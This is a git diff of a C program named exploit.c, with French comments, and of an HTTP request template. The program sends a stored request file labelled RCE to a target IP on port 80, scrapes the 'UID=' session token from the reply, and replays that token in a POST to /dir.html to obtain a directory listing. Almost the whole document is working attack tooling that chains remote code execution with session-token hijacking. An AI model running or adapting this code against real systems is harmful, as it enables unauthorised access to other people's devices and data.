diff --git a/exploit.c b/exploit.c index 83d7ff1..795c1aa 100644 --- a/exploit.c +++ b/exploit.c @@ -3,79 +3,233 @@ #include #include #include +#include -int main(int argc, char** argv){ - if (argc != 2){ - printf("u must specifie IP addr\n"); - exit(1); - } - printf("target = %s\n", argv[1]); - int domain = AF_INET; - int type = SOCK_STREAM; - int fd = socket(domain, type, 0); - printf("fd = %d\n", fd); +void envoie_request(void); +void recevoir_request(void); +void recup_uid(void); - struct sockaddr_in dest_addr; - memset(&dest_addr, 0, sizeof(dest_addr)); - dest_addr.sin_family = AF_INET; - dest_addr.sin_port = htons(80); - dest_addr.sin_addr.s_addr = inet_addr(argv[1]); +int creer_et_connecter_socket(const char* ip_addr) { + int domain = AF_INET; + int type = SOCK_STREAM; + int fd = socket(domain, type, 0); + if (fd < 0) { + printf("Erreur création socket\n"); + return -1; + } + printf("fd = %d\n", fd); - int ret = connect(fd,(struct sockaddr*)&dest_addr, sizeof(dest_addr)); - printf("ret_connect = %d\n", ret); + struct sockaddr_in dest_addr; + memset(&dest_addr, 0, sizeof(dest_addr)); + dest_addr.sin_family = AF_INET; + dest_addr.sin_port = htons(80); + dest_addr.sin_addr.s_addr = inet_addr(ip_addr); - FILE* fichier_out = fopen("request_rce.txt", "r"); - fseek(fichier_out, 0, SEEK_END); - - - int size = fichier_out->_offset; - char* file_buffer = malloc(size); - - fseek(fichier_out, 0, SEEK_SET); - fread(file_buffer, 1, size, fichier_out); - - for (int i = 0; i < size; i++){ - char c = file_buffer[i]; - if (c == '\n') - send(fd, "\r\n", 2, 0); - else - send(fd, &c, 1, 0); - } - send(fd, "\r\n", 2, 0); - - printf("recv:\n"); - char c = 0; - int n = 0; - char* text = calloc(1, 1); - int len = 0; - while (( n = recv(fd, &c, 1, 0)) > 0){ - len = strlen(text) + 2; - text = realloc(text, len); - text[len - 2] = c; - text[len - 1] = 0; - } - int index = 0; - char uid[400]; - while (text[index]){ - if (text[index] == 'U'){ - if (strncmp(text + index, "UID=", 4) == 0){ - printf("pattern found\n"); - index += 4; - int j = 0 ; - while(text[index] && text[index] != ';' && text[index] != '\r' && text[index] != '\n'){ - uid[j] = text[index]; - j++; - index++; - } - uid[j + 1] = 0; - break; - } - } - index++; - - } - printf("uid=%s\n", uid); - fclose(fichier_out); - free(file_buffer); - return 0; + int ret = connect(fd, (struct sockaddr*)&dest_addr, sizeof(dest_addr)); + if (ret < 0) { + printf("Erreur connexion\n"); + close(fd); + return -1; + } + printf("ret_connect = %d\n", ret); + + return fd; +} + +void envoyer_requete(int fd, const char* fichier_requete) { + FILE* fichier_out = fopen(fichier_requete, "r"); + if (!fichier_out) { + printf("Erreur ouverture fichier: %s\n", fichier_requete); + return; + } + + fseek(fichier_out, 0, SEEK_END); + long size = ftell(fichier_out); + char* file_buffer = malloc(size + 1); + + fseek(fichier_out, 0, SEEK_SET); + fread(file_buffer, 1, size, fichier_out); + file_buffer[size] = '\0'; + + printf("\n--- Envoi requête depuis %s ---\n", fichier_requete); + + for (int i = 0; i < size; i++) { + char c = file_buffer[i]; + if (c == '\n') + send(fd, "\r\n", 2, 0); + else + send(fd, &c, 1, 0); + } + send(fd, "\r\n", 2, 0); + + free(file_buffer); + fclose(fichier_out); +} + +void recevoir_reponse(int fd, char** reponse, int* taille) { + char c = 0; + int n = 0; + char* text = calloc(1, 1); + int len = 0; + + printf("\n--- Réponse reçue ---\n"); + + struct timeval tv; + tv.tv_sec = 5; + tv.tv_usec = 0; + setsockopt(fd, SOL_SOCKET, SO_RCVTIMEO, &tv, sizeof(tv)); + + while ((n = recv(fd, &c, 1, 0)) > 0) { + printf("%c", c); + len = strlen(text) + 2; + text = realloc(text, len); + text[len - 2] = c; + text[len - 1] = 0; + } + + printf("\n--- Fin réponse ---\n"); + + *reponse = text; + *taille = len; +} + +char* extraire_uid(const char* reponse) { + int index = 0; + char* uid = malloc(400); + memset(uid, 0, 400); + + while (reponse[index]) { + if (reponse[index] == 'U') { + if (strncmp(reponse + index, "UID=", 4) == 0) { + printf("\nPattern UID= trouvé\n"); + index += 4; + int j = 0; + while (reponse[index] && reponse[index] != ';' && + reponse[index] != '\r' && reponse[index] != '\n') { + uid[j] = reponse[index]; + j++; + index++; + } + uid[j] = 0; + break; + } + } + index++; + } + + if (strlen(uid) == 0) { + printf("UID non trouvé dans la réponse\n"); + free(uid); + return NULL; + } + + printf("UID extrait = %s\n", uid); + return uid; +} + +void envoyer_requete_dir_avec_token(int fd, const char* fichier_requete, const char* uid) { + FILE* fichier_out = fopen(fichier_requete, "r"); + if (!fichier_out) { + printf("Erreur ouverture fichier: %s\n", fichier_requete); + return; + } + + fseek(fichier_out, 0, SEEK_END); + long size = ftell(fichier_out); + char* file_buffer = malloc(size + 1); + + fseek(fichier_out, 0, SEEK_SET); + fread(file_buffer, 1, size, fichier_out); + file_buffer[size] = '\0'; + + printf("\n--- Envoi requête DIR avec UID: %s ---\n", uid); + + for (int i = 0; i < size; i++) { + char c = file_buffer[i]; + printf("%c", c); + + if (c == 'U') { + if (strncmp(file_buffer + i, "UID=", 4) == 0) { + send(fd, file_buffer + i, 4, 0); + send(fd, uid, strlen(uid), 0); + send(fd, "\r\n", 2, 0); + printf("ID=%s", uid); + i += 3; + continue; + } + } + else if (c == '\n') { + send(fd, "\r\n", 2, 0); + } + else { + send(fd, &c, 1, 0); + } + } + send(fd, "\r\n\r\n", 4, 0); + + free(file_buffer); + fclose(fichier_out); +} + +int main(int argc, char** argv) { + if (argc != 2) { + printf("Tu dois spécifier l'adresse IP\n"); + exit(1); + } + + printf("target = %s\n", argv[1]); + + printf("\n========== PREMIÈRE REQUÊTE (RCE) ==========\n"); + + int fd = creer_et_connecter_socket(argv[1]); + if (fd < 0) { + exit(1); + } + + envoyer_requete(fd, "request_rce.txt"); + + char* reponse1 = NULL; + int taille1 = 0; + recevoir_reponse(fd, &reponse1, &taille1); + + char* uid = extraire_uid(reponse1); + + close(fd); + + if (!uid) { + printf("Impossible d'extraire l'UID, arrêt du programme\n"); + free(reponse1); + exit(1); + } + + printf("\nUID récupéré avec succès: [%s]\n", uid); + + printf("\n========== DEUXIÈME REQUÊTE (DIR) ==========\n"); + + int fd2 = creer_et_connecter_socket(argv[1]); + if (fd2 < 0) { + free(uid); + free(reponse1); + exit(1); + } + + envoyer_requete_dir_avec_token(fd2, "request_dir_with_token.txt", uid); + + char* reponse2 = NULL; + int taille2 = 0; + recevoir_reponse(fd2, &reponse2, &taille2); + + if (reponse2 && strlen(reponse2) > 0) { + printf("\n--- RÉPONSE DIR COMPLÈTE ---\n"); + printf("%s\n", reponse2); + } else { + printf("\nAucune réponse reçue pour la requête DIR\n"); + } + + close(fd2); + free(uid); + free(reponse1); + free(reponse2); + + return 0; } diff --git a/request_dir_with_token.txt b/request_dir_with_token.txt index e69de29..016bdec 100644 --- a/request_dir_with_token.txt +++ b/request_dir_with_token.txt @@ -0,0 +1,17 @@ +POST /dir.html HTTP/1.1 +Host: localhost +sec-ch-ua-platform: "Windows" +Accept-Language: fr-FR,fr;q=0.9 +sec-ch-ua: "Not-A.Brand";v="24", "Chromium";v="146" +Content-Type: application/x-www-form-urlencoded +sec-ch-ua-mobile: ?0 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36 +Accept: */* +Origin: http://localhost +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: cors +Sec-Fetch-Dest: empty +Referer: http://localhost/main.html +Accept-Encoding: gzip, deflate, br +Cookie: client_lang=french; viewmode=0; UID= +Connection: keep-alive